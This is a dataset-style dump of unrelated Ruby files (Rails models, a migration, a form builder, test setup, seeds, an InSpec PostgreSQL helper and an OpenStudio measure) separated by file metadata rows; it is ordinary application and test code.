  # s.public_header_files = "Classes/**/*.h"

  # --- Resources ------------------------------------------------------- #
  #
  #  A list of resources included with the Pod. These are copied into the
  #  target bundle with a build phase script. Anything else will be cleaned.
  #  You can preserve files from being cleaned, please don't preserve
  #  non-essential files like tests, examples and documentation.
  #

  # s.resource  = "icon.png"
  # s.resources = "Resources/*.png"
  # s.preserve_paths = "FilesToSave", "MoreFilesToSave"

  # --- Project Linking ------------------------------------------------- #
  #
  #  Link your library with frameworks, or libraries. Libraries do not include
  #  the lib prefix of their name.
  #

  # s.framework  = "SomeFramework"
  s.frameworks = 'AVFoundation','Foundation'

  # s.library   = "iconv"
  # s.libraries = "iconv", "xml2"

  # --- Project Settings ------------------------------------------------ #
  #
  #  If your library depends on compiler flags you can set them in the xcconfig hash
  #  where they will only apply to your library. If you depend on other Podspecs
  #  you can include multiple dependencies to ensure it works.

  s.requires_arc = true

  # s.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
  # s.dependency "JSONKit", "~> 1.4"
  # NOTE(review): framework name does not match s.name — see note at top.
  s.vendored_frameworks = 'Rvs_Viewer.framework'
end
| 37.151079 | 96 | 0.594888 |
01dc2643ef8b39daf29488f7f966776b8e634270 | 66 | FactoryGirl.define do
  # Empty factory: builds a DropboxToken with all model defaults.
  # NOTE(review): FactoryGirl was renamed to FactoryBot in 2017 — consider
  # migrating when the gem is next updated.
  factory :dropbox_token do
  end
end
| 9.428571 | 27 | 0.712121 |
ffcaad18b5d41fb7aabd85ae39745ef625daf8c9 | 199 | class CreatePets < ActiveRecord::Migration[5.2]
  def change
    create_table :pets do |t|
      t.string :name
      t.string :species
      # Plain integer column — no foreign key or index is created here.
      t.integer :user_id
      t.timestamps
    end
  end
end
| 16.583333 | 47 | 0.633166 |
ab7fd31305381ef52737b59db0e57c1ba72bf32c | 1,379 | class FranchiseProfileSearch < ActiveRecord::BaseWithoutTable
  # Table-less search form object for paginating a franchise's profiles,
  # optionally filtered by a free-text phrase matched across several columns.
  column :phrase, :string, ""
  column :page, :integer, 1
  column :per_page, :integer, 25
  column :franchise_id, :integer

  # Options for the per-page <select> control in the search form.
  def self.per_page_select_options
    [["25", "25"], ["50", "50"], ["100", "100"], ["250", "250"], ["500", "500"], ["1000", "1000"]]
  end

  # Paginated FranchiseProfile records matching the current search state.
  def profiles
    FranchiseProfile.paginate(
      :conditions => conditions,
      :per_page => per_page,
      :order => order,
      :page => page,
      :joins => " INNER JOIN (profiles LEFT JOIN users ON profiles.id = users.profile_id) ON franchise_profiles.profile_id = profiles.id"
    )
  end

  private

  # Builds the SQL conditions array: franchise scope plus, when a phrase is
  # present, one LIKE clause (and one bind value) per searchable column.
  # NOTE(review): `not_nil?` and `empty_or_nil?` are non-standard — presumably
  # core extensions defined elsewhere in the app; verify they exist.
  def conditions
    rvalue = nil
    if Site.current_site_id.not_nil? && !phrase.empty_or_nil?
      rvalue = ["franchise_profiles.franchise_id = ? AND (#{like_conditions.join(" OR ")})"]
      rvalue << self.franchise_id
      # One wildcard-wrapped bind value per LIKE clause; the phrase itself is
      # bound, not interpolated, so it is safe from SQL injection.
      like_conditions.length.times do
        rvalue << "%#{phrase}%"
      end
    elsif Site.current_site_id.not_nil?
      rvalue = ["franchise_profiles.franchise_id = ?", self.franchise_id]
    end
    rvalue
  end

  def order
    "profiles.last_name, profiles.first_name"
  end

  # LIKE fragments matched against the search phrase.
  def like_conditions
    [
      "users.login LIKE ?",
      "profiles.email LIKE ?",
      "profiles.first_name LIKE ?",
      "profiles.last_name LIKE ?",
      "franchise_profiles.profile_id LIKE ?"
    ]
  end
end
| 26.018868 | 137 | 0.631617 |
21955e147ea5a2897864a41c3b7909a2fa7afb4a | 4,957 | # copyright: 2015, Vulcano Security GmbH
module Inspec::Resources
  # Helper resource shared by the postgres_* resources: locates the service
  # name, data directory, config directory and main config file for the
  # installed PostgreSQL version on the target host.
  class Postgres < Inspec.resource(1)
    name "postgres"
    supports platform: "unix"
    desc "The 'postgres' resource is a helper for the 'postgres_conf', 'postgres_hba_conf', 'postgres_ident_conf' & 'postgres_session' resources. Please use those instead."

    attr_reader :service, :data_dir, :conf_dir, :conf_path, :version, :cluster

    def initialize
      # determine dirs and service based on versions
      determine_dirs
      determine_service

      # print warnings if the dirs do not exist
      verify_dirs

      if !@version.to_s.empty? && !@conf_dir.to_s.empty?
        @conf_path = File.join @conf_dir, "postgresql.conf"
      else
        @conf_path = nil
        skip_resource "Seems like PostgreSQL is not installed on your system"
      end
    end

    def to_s
      "PostgreSQL"
    end

    private

    # Sets @version, @conf_dir, @data_dir (and on Debian also @cluster),
    # preferring `psql --version` and falling back to directory inspection.
    def determine_dirs
      if inspec.os.debian?
        #
        # https://wiki.debian.org/PostgreSql
        #
        # Debian allows multiple versions of postgresql to be
        # installed as well as multiple "clusters" to be configured.
        #
        @version = version_from_psql || version_from_dir("/etc/postgresql")
        unless @version.to_s.empty?
          @cluster = cluster_from_dir("/etc/postgresql/#{@version}")
          @conf_dir = "/etc/postgresql/#{@version}/#{@cluster}"
          @data_dir = "/var/lib/postgresql/#{@version}/#{@cluster}"
        end
      else
        @version = version_from_psql
        if @version.to_s.empty?
          if inspec.directory("/var/lib/pgsql/data").exist?
            warn "Unable to determine PostgreSQL version: psql did not return" \
              "a version number and unversioned data directories were found."
          else
            @version = version_from_dir("/var/lib/pgsql")
          end
        end
        @data_dir = locate_data_dir_location_by_version(@version)
      end

      @conf_dir ||= @data_dir
    end

    # PostgreSQL >= 10 uses major-only service suffixes ("postgresql-10");
    # 9.4–9.6 use major.minor ("postgresql-9.5"); older versions no suffix.
    def determine_service
      @service = "postgresql"
      if @version.to_i >= 10
        @service += "-#{@version.to_i}"
      elsif @version.to_f >= 9.4
        @service += "-#{@version}"
      end
    end

    # Warn (but do not fail) when the detected directories are absent.
    def verify_dirs
      unless inspec.directory(@conf_dir).exist?
        warn "Default postgresql configuration directory: #{@conf_dir} does not exist. " \
          "Postgresql may not be installed or we've misidentified the configuration " \
          "directory."
      end

      unless inspec.directory(@data_dir).exist?
        warn "Default postgresql data directory: #{@data_dir} does not exist. " \
          "Postgresql may not be installed or we've misidentified the data " \
          "directory."
      end
    end

    # major.minor version string from `psql --version`, or nil when psql is
    # not on the target's PATH.
    def version_from_psql
      return unless inspec.command("psql").exist?

      inspec.command("psql --version | awk '{ print $NF }' | awk -F. '{ print $1\".\"$2 }'").stdout.strip
    end

    # First existing candidate data directory for the given version, checking
    # versioned locations before the unversioned fallbacks.
    def locate_data_dir_location_by_version(ver = @version)
      dir_list = [
        "/var/lib/pgsql/#{ver}/data",
        # for 10, the versions are just stored in `10` although their version `10.7`
        "/var/lib/pgsql/#{ver.to_i}/data",
        "/var/lib/pgsql/data",
        "/var/lib/postgres/data",
        "/var/lib/postgresql/data",
      ]

      data_dir_loc = dir_list.detect { |i| inspec.directory(i).exist? }

      if data_dir_loc.nil?
        warn 'Unable to find the PostgreSQL data_dir in expected location(s), please
        execute "psql -t -A -p <port> -h <host> -c "show hba_file";" as the PostgreSQL
        DBA to find the non-standard data_dir location.'
      end

      data_dir_loc
    end

    # Infers the version from the versioned subdirectories of +dir+; when
    # several versions are installed the first listed one wins (with a warn).
    def version_from_dir(dir)
      dirs = inspec.command("ls -d #{dir}/*/").stdout
      entries = dirs.lines.count
      case entries
      when 0
        warn "Could not determine version of installed postgresql by inspecting #{dir}"
        nil
      when 1
        warn "Using #{dirs}: #{dir_to_version(dirs)}"
        dir_to_version(dirs)
      else
        warn "Multiple versions of postgresql installed or incorrect base dir #{dir}"
        first = dir_to_version(dirs.lines.first)
        warn "Using the first version found: #{first}"
        first
      end
    end

    # "/etc/postgresql/9.5/" -> "9.5"
    def dir_to_version(dir)
      dir.chomp.split("/").last
    end

    # Debian cluster name under +dir+; prefers the conventional "main",
    # otherwise the first cluster directory found (warning on ambiguity).
    def cluster_from_dir(dir)
      # Main is the default cluster name on debian use it if it
      # exists.
      if inspec.directory("#{dir}/main").exist?
        "main"
      else
        dirs = inspec.command("ls -d #{dir}/*/").stdout.lines
        if dirs.empty?
          warn "No postgresql clusters configured or incorrect base dir #{dir}"
          return nil
        end

        first = dirs.first.chomp.split("/").last
        if dirs.count > 1
          warn "Multiple postgresql clusters configured or incorrect base dir #{dir}"
          warn "Using the first directory found: #{first}"
        end
        first
      end
    end
  end
end
| 32.398693 | 173 | 0.611862 |
87a214b25a03961409477db67b31a0babd77e3a2 | 990 | # Blatantly stolen from somewhere!
require 'ansi/code'
require "minitest/reporters"
module Minitest
  module Reporters
    # Compact console reporter: one line per test with colored status, timing
    # and name, plus a colorized summary footer.
    class LocalReporter < BaseReporter
      include ANSI::Code
      include RelativePosition

      def start
        super
      end

      # Summary footer: total time, counts, failure/error totals colored
      # green when clean and red otherwise, skip count in yellow.
      def report
        super
        puts('Finished in %.5fs' % total_time)
        print('%d tests, %d assertions, ' % [count, assertions])
        color = failures.zero? && errors.zero? ? :green : :red
        print(send(color) { '%d failures, %d errors, ' } % [failures, errors])
        print(yellow { '%d skips' } % skips)
        puts
      end

      # Per-test line: colored status, elapsed time, test name with the
      # minitest `test_NNNN_` prefix stripped, then failure details (skipped
      # tests get no detail block).
      def record(test)
        super
        print_colored_status(test)
        print(" (%.2fs)" % test.time)
        print pad_test(test.name.gsub(/^test_\d{4}_/,''))
        puts
        return if test.skipped?
        if test.failure
          print_info(test.failure); puts
        end
      end

      def before_suite(suite)
        puts suite
      end
    end
  end
end
| 22.5 | 78 | 0.570707 |
030fe6dea3fa8d1c7ee879e59c02ee1e6f9cb698 | 319 | class Band < ActiveRecord::Base
  validates(:band_name, :presence => true)
  validates(:band_name, :uniqueness => true)
  # Normalize the name casing before every save.
  before_save(:capitalize_first_letter)
  has_and_belongs_to_many :venues

  private

  # NOTE(review): String#capitalize already lowercases the remainder of the
  # string, so the explicit downcase is redundant (but harmless). Using
  # define_method here instead of a plain `def` has no visible benefit.
  define_method(:capitalize_first_letter) do
    self.band_name=(band_name().downcase().capitalize)
  end
end
| 26.583333 | 56 | 0.755486 |
388b883829c6fcf18794f5313a8aa65a553eb864 | 3,157 | # see the URL below for information on how to write OpenStudio measures
# http://nrel.github.io/OpenStudio-user-documentation/measures/measure_writing_guide/
# start the measure
# OpenStudio EnergyPlus measure that adds a single empty thermal zone, named
# by the user, to the workspace.
class EnergyPlusMeasure < OpenStudio::Ruleset::WorkspaceUserScript
  # human readable name
  # NOTE(review): NAME_TEXT, DESCRIPTION_TEXT and MODELER_DESCRIPTION_TEXT
  # look like template placeholders — replace before publishing the measure.
  def name
    return "NAME_TEXT"
  end

  # human readable description
  def description
    return "DESCRIPTION_TEXT"
  end

  # human readable description of modeling approach
  def modeler_description
    return "MODELER_DESCRIPTION_TEXT"
  end

  # define the arguments that the user will input
  def arguments(workspace)
    args = OpenStudio::Ruleset::OSArgumentVector.new

    # the name of the zone to add to the model (required string argument)
    zone_name = OpenStudio::Ruleset::OSArgument.makeStringArgument("zone_name", true)
    zone_name.setDisplayName("New zone name")
    zone_name.setDescription("This name will be used as the name of the new zone.")
    args << zone_name

    return args
  end

  # define what happens when the measure is run
  def run(workspace, runner, user_arguments)
    super(workspace, runner, user_arguments)

    # use the built-in error checking
    if !runner.validateUserArguments(arguments(workspace), user_arguments)
      return false
    end

    # assign the user inputs to variables
    zone_name = runner.getStringArgumentValue("zone_name", user_arguments)

    # check the user_name for reasonableness
    if zone_name.empty?
      runner.registerError("Empty zone name was entered.")
      return false
    end

    # get all thermal zones in the starting model
    zones = workspace.getObjectsByType("Zone".to_IddObjectType)

    # reporting initial condition of model
    runner.registerInitialCondition("The building started with #{zones.size} zones.")

    # add a new zone to the model with the new name, as a raw IDF snippet
    # http://apps1.eere.energy.gov/buildings/energyplus/pdfs/inputoutputreference.pdf#nameddest=Zone
    new_zone_string = "
      Zone,
        #{zone_name},            !- Name
        0,                       !- Direction of Relative North {deg}
        0,                       !- X Origin {m}
        0,                       !- Y Origin {m}
        0,                       !- Z Origin {m}
        1,                       !- Type
        1,                       !- Multiplier
        autocalculate,           !- Ceiling Height {m}
        autocalculate;           !- Volume {m3}
        "
    idfObject = OpenStudio::IdfObject::load(new_zone_string)
    object = idfObject.get
    wsObject = workspace.addObject(object)
    new_zone = wsObject.get

    # echo the new zone's name back to the user, using the index based getString method
    runner.registerInfo("A zone named '#{new_zone.getString(0)}' was added.")

    # report final condition of model
    finishing_zones = workspace.getObjectsByType("Zone".to_IddObjectType)
    runner.registerFinalCondition("The building finished with #{finishing_zones.size} zones.")

    return true
  end
end

# register the measure to be used by the application
EnergyPlusMeasure.new.registerWithApplication
| 33.946237 | 101 | 0.65727 |
01bb9d06d5fedcf35e35743543ef7a1de28c63a4 | 1,702 | class TabularFormBuilder < ActionView::Helpers::FormBuilder
  # Form builder that wraps every input in a <tr><th>label</th><td>input</td>
  # table row.
  # NOTE(review): this first #select definition is shadowed by the
  # redefinition at the bottom of the class, so it is effectively dead code.
  def select(field, select_options = nil, options = {})
    select_options ||= []
    super field, select_options, options
  end

  # For each basic field helper, generate a *_with_label wrapper via a string
  # class_eval, then swap it in with alias_method_chain so plain helper calls
  # get the table-row markup.
  # NOTE(review): alias_method_chain was removed in Rails 5 — confirm the
  # app's Rails version still supports it.
  ['text_field', 'text_area', 'password_field', 'date_select', 'check_box', 'file_field'].each do |selector|
    src = <<-END_SRC
    def #{selector}_with_label(field, options = {})
      options.reverse_merge!(:class => 'string') if '#{selector}' == 'text_field'
      @template.content_tag("tr",
        @template.content_tag("th", label_fu(field)) +
        @template.content_tag("td", #{selector}_without_label(field, options)))
    end
    alias_method_chain :#{selector}, :label
    END_SRC
    class_eval src, __FILE__, __LINE__
  end

  # Keep a handle on the framework's select before redefining it below.
  alias_method :super_select, :select

  def select_with_label(field, select_options = nil, options = {})
    @template.content_tag("tr",
      @template.content_tag("th", label_fu(field)) +
      @template.content_tag("td", select_without_label(field, select_options, options)))
  end

  # Falls back to enum-derived options when none are supplied.
  def select_without_label(field, select_options = nil, options = {})
    select_options ||= select_options_from_enum(field) || []
    super_select field, select_options, options
  end

  def select(field, select_options = nil, options = {})
    select_with_label field, select_options, options
  end

  # Concatenated text fields for several attributes at once.
  def text_fields(*fields)
    fields.inject('') do |res, field|
      res << text_field(field)
    end
  end

  private

  # Option values from the model's enum-like field type, when it exposes one.
  def select_options_from_enum(field)
    if object.class.respond_to?(:field_type) && object.class.field_type(field).respond_to?(:values)
      object.class.field_type(field).values
    end
  end
end | 31.518519 | 109 | 0.668038 |
289a126a3edef2a170fdd9f95fe7815a0dcd5060 | 3,558 | # Run Coverage report
require 'simplecov'
SimpleCov.start do
  add_filter 'spec/dummy'
  add_group 'Controllers', 'app/controllers'
  add_group 'Helpers', 'app/helpers'
  add_group 'Mailers', 'app/mailers'
  add_group 'Models', 'app/models'
  add_group 'Views', 'app/views'
  add_group 'Libraries', 'lib'
end

# Configure Rails Environment
ENV['RAILS_ENV'] = 'test'

require File.expand_path('../dummy/config/environment.rb', __FILE__)

require 'rspec/rails'
require 'database_cleaner'
require 'ffaker'

# Requires supporting ruby files with custom matchers and macros, etc,
# in spec/support/ and its subdirectories.
Dir[File.join(File.dirname(__FILE__), 'support/**/*.rb')].each { |f| require f }

# Requires factories and other useful helpers defined in spree_core.
require 'spree/testing_support/authorization_helpers'
require 'spree/testing_support/capybara_ext'
require 'spree/testing_support/controller_requests'
require 'spree/testing_support/factories'
require 'spree/testing_support/url_helpers'

require 'capybara/rspec'
require 'capybara-screenshot'
require 'capybara-screenshot/rspec'
require 'capybara/rails'

# Requires factories defined in lib/spree_product_publishable/factories.rb
require 'spree_product_publishable/factories'

RSpec.configure do |config|
  config.include FactoryBot::Syntax::Methods

  # Headless Chrome driver for JS-capable feature specs.
  Capybara.register_driver :chrome do |app|
    Capybara::Selenium::Driver.new app,
      browser: :chrome,
      options: Selenium::WebDriver::Chrome::Options.new(args: %w[headless disable-gpu window-size=1920,1080])
  end

  Capybara.javascript_driver = :chrome

  Capybara::Screenshot.register_driver(:chrome) do |driver, path|
    driver.browser.save_screenshot(path)
  end

  # Infer an example group's spec type from the file location.
  config.infer_spec_type_from_file_location!

  # == URL Helpers
  #
  # Allows access to Spree's routes in specs:
  #
  # visit spree.admin_path
  # current_path.should eql(spree.products_path)
  config.include Spree::TestingSupport::UrlHelpers

  # == Requests support
  #
  # Adds convenient methods to request Spree's controllers
  # spree_get :index
  config.include Spree::TestingSupport::ControllerRequests, type: :controller

  # == Mock Framework
  #
  # If you prefer to use mocha, flexmock or RR, uncomment the appropriate line:
  #
  # config.mock_with :mocha
  # config.mock_with :flexmock
  # config.mock_with :rr
  config.mock_with :rspec
  config.color = true

  # Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
  config.fixture_path = "#{::Rails.root}/spec/fixtures"

  # Capybara javascript drivers require transactional fixtures set to false, and we use DatabaseCleaner
  # to cleanup after each test instead. Without transactional fixtures set to false the records created
  # to setup a test will be unavailable to the browser, which runs under a separate server instance.
  config.use_transactional_fixtures = false

  # Ensure Suite is set to use transactions for speed.
  config.before :suite do
    DatabaseCleaner.strategy = :transaction
    DatabaseCleaner.clean_with :truncation
  end

  # Before each spec check if it is a Javascript test and switch between using database transactions or not where necessary.
  config.before :each do
    DatabaseCleaner.strategy = RSpec.current_example.metadata[:js] ? :truncation : :transaction
    DatabaseCleaner.start
  end

  # After each spec clean the database.
  config.after :each do
    DatabaseCleaner.clean
  end

  # NOTE(review): ENV values are strings, so any non-empty FAIL_FAST value —
  # including "false" — enables fail-fast here; confirm that is intended.
  config.fail_fast = ENV['FAIL_FAST'] || false
  config.order = "random"
end
| 32.345455 | 124 | 0.760821 |
e9d288bc96c8b3d9469d5e06a7d4298830230e6e | 1,236 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
# Seed a fixed, pre-activated admin account.
# NOTE(review): the admin email below ("[email protected]") looks like an
# email-obfuscation artifact from the dump — restore the intended address.
User.create!(name: "example person",
             email: "[email protected]",
             password: "foobar",
             password_confirmation: "foobar",
             admin: true,
             activated: true,
             activated_at: Time.zone.now)

# 99 additional pre-activated users with generated names and a shared
# throwaway password.
99.times do |n|
  name = Faker::Name.name
  email = "example-#{n+1}@fake.com"
  password = "password"
  User.create!(name: name,
               email: email,
               password: password,
               password_confirmation: password,
               activated: true,
               activated_at: Time.zone.now)
end

#microposts
# 50 microposts for each of the 6 oldest users (same content across users
# per iteration).
# NOTE(review): `Faker::Lorem.sentence(5)` uses the legacy positional arg —
# newer Faker versions require `sentence(word_count: 5)`.
users = User.order(:created_at).take(6)
50.times do
  content = Faker::Lorem.sentence(5)
  users.each { |user| user.microposts.create!(content: content ) }
end

# following relationships
# The first user follows users 3..51 and is followed by users 4..41.
users = User.all
user = users.first
following = users[2..50]
followers = users[3..40]
following.each { |followed| user.follow(followed) }
followers.each { |follower| follower.follow(user) }
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.